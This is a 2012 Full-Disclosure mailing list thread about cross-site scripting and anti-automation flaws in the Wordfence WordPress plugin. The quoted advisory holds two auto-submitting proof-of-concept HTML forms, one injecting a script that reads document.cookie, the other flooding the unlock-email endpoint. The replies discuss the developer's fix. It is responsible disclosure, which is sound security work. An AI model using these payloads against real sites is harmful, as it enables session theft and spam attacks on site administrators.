Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress

["MustLive" <mustlive () websecurity com ua>]

Hi Mark!

You are welcome. As I see, you've reacted on post to Full-disclosure even
faster then on my letter to you (which I've sent you before disclosing to
security mailing lists). It is example of the power of Full-disclosure ;-).

It's good that you've quickly fixed these holes. But I'm not agree with the
way you've fixed IAA vulnerability (at that XSS is fixed correctly, as I've
checked).

You've wrote in the changelog that you added rate limiting to max of 10
requests per second to the unlock form. But it doesn't protect from
spamming.

As I've wrote in comment to IAA vulnerability in advisory at my site:
"There is no protection (captcha) against automated picking up of admin's
e-mail. And if to know admin's e-mail, then by this way it'll be possible to
spam him by letters from the site".

> From it you can see, that your fix can't protect from this attack (as
captcha could). By sending 10 requests per second with correct e-mail, it'll
be possible to overspam admin's e-mail account (so the plugin is still
vulnerable to IAA and you need to better fix it). Also there are other
vulnerabilities in Wordfence and all of these vulnerabilities concern your
web site too.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 
From: Mark Maunder
To: MustLive
Cc: submissions () packetstormsecurity org ; full-disclosure () lists grok org uk
Sent: Friday, October 19, 2012 9:09 PM
Subject: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence
Security for WordPress


This has been fixed and the release just went out. Version 3.3.7.


The email param is now escaped and we've added rate limiting to the form
with a 3 minute backoff if the limit is exceeded.


http://wordpress.org/extend/plugins/wordfence/changelog/



Thanks for your report.


Regards,


Mark Maunder.





On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustlive () websecurity com ua>
wrote:

Hello list!

I want to warn you about Cross-Site Scripting and Insufficient
Anti-automation vulnerabilities in Wordfence Security for WordPress.

Wordfence - it's security plugin for WordPress.

-------------------------
Affected products:
-------------------------

Vulnerable are Wordfence Security 3.3.5 and previous versions.

----------
Details:
----------

XSS (WASC-08):

Wordfence Security XSS.html

<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post">
<input type="hidden" name="email"
value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>

Insufficient Anti-automation (WASC-21):

Wordfence Security IAA.html

<html>
<head>
<title>Wordfence Security IAA exploit (C) 2012 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post">
<input type="hidden" name="email" value="admin () e-mail com">
</form>
</body>
</html>

I've informed the plugin developer about vulnerabilities. And mentioned
about these vulnerabilities at my site (http://websecurity.com.ua/6106/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

-- 
Mark Maunder <mmaunder () gmail com>
France: (+33) 068-700-8029


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/